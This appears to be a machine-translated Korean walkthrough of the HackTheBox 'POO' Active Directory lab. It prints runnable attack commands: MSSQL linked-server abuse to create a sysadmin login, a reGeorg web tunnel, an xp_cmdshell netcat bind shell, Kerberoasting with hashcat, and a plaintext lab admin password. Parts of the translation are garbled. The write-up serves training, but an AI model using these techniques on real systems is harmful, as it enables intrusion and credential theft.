HackTheBoxend게임. 실험실 전문 공격 작전 통과. 침투 테스트 Active Directory

이 기사에서는 기계뿐만 아니라 사이트에서 전체 미니 실험실의 통과를 분석합니다. 핵더박스.

설명에 명시된 바와 같이 POO는 소규모 Active Directory 환경에서 공격의 모든 단계에서 기술을 테스트하도록 설계되었습니다. 목표는 사용 가능한 호스트를 손상시키고 권한을 에스컬레이션하며 프로세스에서 5개의 플래그를 수집하여 결국 전체 도메인을 손상시키는 것입니다.

실험실 연결은 VPN을 통해 이루어집니다. 정보 보안에 대해 아는 사람들과 사설 네트워크에 들어가기 때문에 작동 중인 컴퓨터나 중요한 데이터가 있는 호스트에서 연결하지 않는 것이 좋습니다 🙂

조직 정보
새로운 기사, 소프트웨어 및 기타 정보에 대해 알아볼 수 있도록 전보 채널 и 문제를 논의하는 그룹 IIKB 영역에서. 또한 귀하의 개인적인 요청, 질문, 제안 및 권장 사항 하나하나 살펴보고 답변드리겠습니다..

모든 정보는 교육 목적으로만 제공됩니다. 이 문서의 저자는 이 문서를 연구한 결과 얻은 지식과 방법을 사용한 결과로 인해 발생한 모든 사람의 손해에 대해 책임을 지지 않습니다.

소개

이 최종 게임은 두 대의 기계로 구성되며 5개의 플래그를 포함합니다.

사용 가능한 호스트의 설명과 주소도 제공됩니다.

시작하자!

정찰기

이 머신에는 /etc/hosts에 추가한 10.13.38.11의 IP 주소가 있습니다.
10.13.38.11 poo.htb

첫 번째 단계는 열린 포트를 스캔하는 것입니다. nmap으로 모든 포트를 스캔하려면 시간이 오래 걸리기 때문에 먼저 masscan으로 하겠습니다. 0pps에서 tun500 인터페이스의 모든 TCP 및 UDP 포트를 스캔합니다.

sudo masscan -e tun0 -p1-65535,U:1-65535 10.13.38.11 --rate=500

이제 포트에서 실행되는 서비스에 대한 자세한 정보를 얻기 위해 -A 옵션을 사용하여 스캔을 실행해 보겠습니다.

nmap -A poo.htb -p80,1433

따라서 IIS 및 MSSQL 서비스가 있습니다. 이 경우 도메인과 컴퓨터의 실제 DNS 이름을 찾습니다. 웹 서버에서 IIS 홈 페이지가 우리를 맞이합니다.

디렉토리를 반복해 봅시다. 나는 이것을 위해 고 버스터를 사용합니다. 매개 변수에서 스트림 128(-t), URL(-u), 사전(-w) 및 관심 있는 확장(-x)의 수를 지정합니다.

gobuster dir -t 128 -u poo.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,aspx,html

따라서 /admin 디렉토리에 대한 HTTP 인증과 .DS_Store 데스크탑 서비스 스토리지 파일을 사용할 수 있습니다. .DS_Store는 파일 목록, 아이콘 위치, 선택한 배경 이미지와 같은 폴더에 대한 사용자 설정을 저장하는 파일입니다. 이러한 파일은 웹 개발자의 웹 서버 디렉토리에 있을 수 있습니다. 따라서 디렉토리 내용에 대한 정보를 얻습니다. 이를 위해 다음을 사용할 수 있습니다. DS_스토어 크롤러.

python3 dsstore_crawler.py -i http://poo.htb/

우리는 디렉토리의 내용을 얻습니다. 여기서 가장 흥미로운 점은 /dev 디렉토리인데, 여기에서 소스와 db 파일을 두 가지로 볼 수 있습니다. 그러나 서비스가 IIS ShortName에 취약한 경우 파일 및 디렉터리 이름의 처음 6자를 사용할 수 있습니다. 다음을 사용하여 이 취약점을 확인할 수 있습니다. IIS 단축 이름 스캐너.

그리고 "poo_co"로 시작하는 하나의 텍스트 파일을 찾습니다. 다음에 무엇을 해야할지 몰라서 디렉토리 사전에서 "co"로 시작하는 모든 단어를 선택했습니다.

cat /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt | grep -i "^co" > co_words.txt

그리고 wfuzz로 반복합니다.

wfuzz -w ./co_words.txt -u "http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txt" --hc 404

그리고 올바른 단어를 찾으십시오! 이 파일을보고 자격 증명을 저장합니다 (DBNAME 매개 변수로 판단하면 MSSQL에서 가져온 것입니다).

깃발을 넘기고 20% 전진합니다.

허 플래그

우리는 MSSQL에 연결하고 저는 DBeaver를 사용합니다.

이 데이터베이스에서 흥미로운 것을 찾지 못했습니다. SQL 편집기를 만들고 사용자가 무엇인지 확인하겠습니다.

SELECT name FROM master..syslogins;

두 명의 사용자가 있습니다. 우리의 특권을 확인합시다.

SELECT is_srvrolemember('sysadmin'), is_srvrolemember('dbcreator'), is_srvrolemember('bulkadmin'), is_srvrolemember('diskadmin'), is_srvrolemember('processadmin'), is_srvrolemember('serveradmin'), is_srvrolemember('setupadmin'), is_srvrolemember('securityadmin');

따라서 특권이 없습니다. 연결된 서버를 보자, 나는 이 기술에 대해 자세히 썼다 여기에.

SELECT * FROM master..sysservers;

그래서 우리는 다른 SQL Server를 찾습니다. openquery()를 사용하여 이 서버에서 명령 실행을 확인합시다.

SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'select @@version as version');

그리고 쿼리 트리를 만들 수도 있습니다.

SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT version FROM openquery("COMPATIBILITYPOO_PUBLIC", ''select @@version as version'');');

사실 연결된 서버에 요청을 하면 다른 사용자의 컨텍스트에서 요청이 실행됩니다! 연결된 서버에서 실행 중인 사용자 컨텍스트를 살펴보겠습니다.

SELECT name FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT user_name() as name');

이제 연결된 서버에서 우리 서버로의 요청이 어떤 컨텍스트에서 실행되는지 살펴보겠습니다!

SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT name FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT user_name() as name'');');

따라서 모든 권한을 가져야 하는 DBO 컨텍스트입니다. 연결된 서버에서 요청한 경우 권한을 확인합시다.

SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT * FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT is_srvrolemember(''''sysadmin''''), is_srvrolemember(''''dbcreator''''), is_srvrolemember(''''bulkadmin''''), is_srvrolemember(''''diskadmin''''), is_srvrolemember(''''processadmin''''), is_srvrolemember(''''serveradmin''''), is_srvrolemember(''''setupadmin''''), is_srvrolemember(''''securityadmin'''')'')');

보시다시피, 우리는 모든 특권을 가지고 있습니다! 이렇게 관리자를 만들어 봅시다. 그러나 그들은 openquery를 통해 허용하지 않습니다. EXECUTE AT를 통해 수행하겠습니다.

EXECUTE('EXECUTE(''CREATE LOGIN [ralf] WITH PASSWORD=N''''ralfralf'''', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''CREATE USER [ralf] FOR LOGIN [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER SERVER ROLE [sysadmin] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER ROLE [db_owner] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";

이제 새 사용자의 자격 증명으로 연결하고 새 플래그 데이터베이스를 관찰합니다.

이 깃발을 넘겨주고 더 나아갑니다.

역추적 플래그

MSSQL을 사용하여 셸을 가져오겠습니다. 저는 impacket 패키지의 mssqlclient를 사용하고 있습니다.

mssqlclient.py ralf:[email protected] -db POO_PUBLIC

우리는 암호를 얻어야 하고, 우리가 이미 만난 첫 번째 것은 사이트입니다. 따라서 웹 서버 구성이 필요합니다(편리한 셸을 던지는 것은 불가능하며 분명히 방화벽이 작동합니다).

그러나 액세스가 거부되었습니다. MSSQL에서 파일을 읽을 수 있지만 어떤 프로그래밍 언어가 구성되어 있는지 알아야 합니다. 그리고 MSSQL 디렉토리에서 우리는 파이썬이 있다는 것을 알게 됩니다.

그러면 web.config 파일을 읽는 데 문제가 없습니다.

EXEC sp_execute_external_script
@language = N'Python',
@script = "print(open('C:inetpubwwwrootweb.config').read())"

자격 증명을 찾은 상태에서 /admin으로 이동하여 플래그를 선택합니다.

거점 깃발

사실 방화벽 사용에 따른 불편함도 있지만 네트워크 설정을 살펴보면 IPv6 프로토콜도 사용하고 있음을 알 수 있습니다!

이 주소를 /etc/hosts에 추가하십시오.
dead:babe::1001 poo6.htb
이번에는 IPv6을 통해 호스트를 다시 스캔해 보겠습니다.

그리고 WinRM 서비스는 IPv6을 통해 사용할 수 있습니다. 찾은 자격 증명으로 연결해 보겠습니다.

바탕 화면에 깃발이 있습니다.

P00ned 플래그

호스트 정찰 후 윈피 우리는 특별한 것을 찾지 않습니다. 그런 다음 자격 증명을 다시 찾기로 결정했습니다 (이 주제에 대해서도 썼습니다 статью). 하지만 WinRM을 통해 시스템에서 모든 SPN을 가져올 수 없었습니다.

setspn.exe -T intranet.poo -Q */*

MSSQL을 통해 명령을 실행해 봅시다.

이런 식으로 사용자 p00_hr 및 p00_adm의 SPN을 얻습니다. 즉, Kerberoasting과 같은 공격에 취약하다는 의미입니다. 요컨대, 암호의 해시를 얻을 수 있습니다.

먼저 MSSQL 사용자를 대신하여 안정적인 셸을 가져와야 합니다. 그러나 액세스가 제한되어 있기 때문에 포트 80과 1433을 통해서만 호스트와 연결할 수 있습니다. 그러나 포트 80을 통해 트래픽을 터널링하는 것은 가능합니다! 이를 위해 우리는 사용할 것입니다 다음 신청. 웹 서버의 홈 디렉터리인 C:inetpubwwwroot에 tunnel.aspx 파일을 업로드해 보겠습니다.

그런데 접근을 시도하면 404 에러가 발생하는데 이는 *.aspx 파일이 실행되지 않는다는 뜻입니다. 이러한 확장자를 가진 파일을 실행하려면 다음과 같이 ASP.NET 4.5를 설치합니다.

dism /online /enable-feature /all /featurename:IIS-ASPNET45

그리고 이제 tunnel.aspx에 액세스할 때 모든 것이 준비되었다는 대답을 얻습니다.

트래픽을 릴레이할 애플리케이션의 클라이언트 부분을 시작하겠습니다. 포트 5432의 모든 트래픽을 서버로 전달합니다.

python ./reGeorgSocksProxy.py -p 5432 -u http://poo.htb/tunnel.aspx

그리고 프록시체인을 사용하여 프록시를 통해 모든 애플리케이션의 트래픽을 보냅니다. 이 프록시를 /etc/proxychains.conf 구성 파일에 추가해 보겠습니다.

이제 서버에 프로그램을 업로드하자 넷캣, 안정적인 바인드 셸을 만들고 스크립트 Kerberoast 호출, Kerberoasting 공격을 수행합니다.

이제 MSSQL을 통해 수신기를 시작합니다.

xp_cmdshell C:tempnc64.exe -e powershell.exe -lvp 4321

그리고 프록시를 통해 연결합니다.

proxychains rlwrap nc poo.htb 4321

그리고 해시를 얻자.

. .Invoke-Kerberoast.ps1
Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat | Select-Object Hash | Out-File -filepath 'C:tempkerb_hashes.txt' -Width 8000
type kerb_hashes.txt

다음으로 이러한 해시를 반복해야 합니다. rockyou에는 암호 데이터 사전이 없었기 때문에 Seclists에서 제공하는 모든 암호 사전을 사용했습니다. 열거에는 hashcat을 사용합니다.

hashcat -a 0 -m 13100 krb_hashes.txt /usr/share/seclists/Passwords/*.txt --force

그리고 dutch_passwordlist.txt 사전에서 첫 번째 암호와 Keyboard-Combinations.txt에서 두 번째 암호를 모두 찾습니다.

사용자가 XNUMX명이므로 도메인 컨트롤러로 이동합니다. 먼저 그의 주소를 알아봅시다.

좋습니다. 도메인 컨트롤러의 IP 주소를 배웠습니다. 도메인의 모든 사용자와 그 중 누가 관리자인지 알아봅시다. PowerView.ps1 정보를 얻기 위해 스크립트를 다운로드하려면. 그런 다음 -s 매개변수에서 스크립트로 디렉토리를 지정하여 evil-winrm을 사용하여 연결합니다. 그런 다음 PowerView 스크립트를 로드하기만 하면 됩니다.

이제 모든 기능에 액세스할 수 있습니다. p00_adm 사용자는 권한이 있는 사용자처럼 보이므로 해당 컨텍스트에서 작업합니다. 이 사용자에 대한 PSCredential 개체를 만들어 보겠습니다.

$User = 'p00_adm'
$Password = 'ZQ!5t4r'
$Cpass = ConvertTo-SecureString -AsPlainText $Password -force
$Creds = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Cpass

이제 Cred를 지정하는 모든 Powershell 명령이 p00_adm을 대신하여 실행됩니다. 사용자 목록과 AdminCount 속성을 표시해 보겠습니다.

Get-NetUser -DomainController dc -Credential $Creds | select name,admincount

따라서 우리 사용자는 정말 특권이 있습니다. 그가 속한 그룹을 보자.

Get-NetGroup -UserName "p00_adm" -DomainController dc -Credential $Creds

최종적으로 사용자가 도메인 관리자임을 확인합니다. 이렇게 하면 도메인 컨트롤러에 원격으로 로그온할 수 있는 권한이 부여됩니다. 터널을 사용하여 WinRM으로 로그인해 보겠습니다. 나는 evil-winrm을 사용할 때 reGeorg에서 발생한 오류로 인해 혼란스러웠습니다.

그런 다음 다른 더 쉬운 방법을 사용합니다. 스크립트 WinRM에 연결합니다. 연결 매개변수를 열고 변경합니다.

우리는 연결을 시도하고 시스템에 있습니다.

그러나 깃발은 없습니다. 그런 다음 사용자를 보고 데스크톱을 확인합니다.

mr3ks에서 플래그를 찾았고 실험실은 100% 완료되었습니다.

그게 다야. 피드백으로 이 문서에서 새로운 것을 배웠는지, 유용했는지에 대해 의견을 말하십시오.

당신은 우리와 함께 할 수 있습니다 텔레그램. 여기에서 흥미로운 자료, 병합 과정 및 소프트웨어를 찾을 수 있습니다. IT의 많은 영역을 이해하는 사람들이 있는 커뮤니티를 모아 IT 및 정보 보안 문제에 대해 항상 서로 도울 수 있습니다.

출처 : habr.com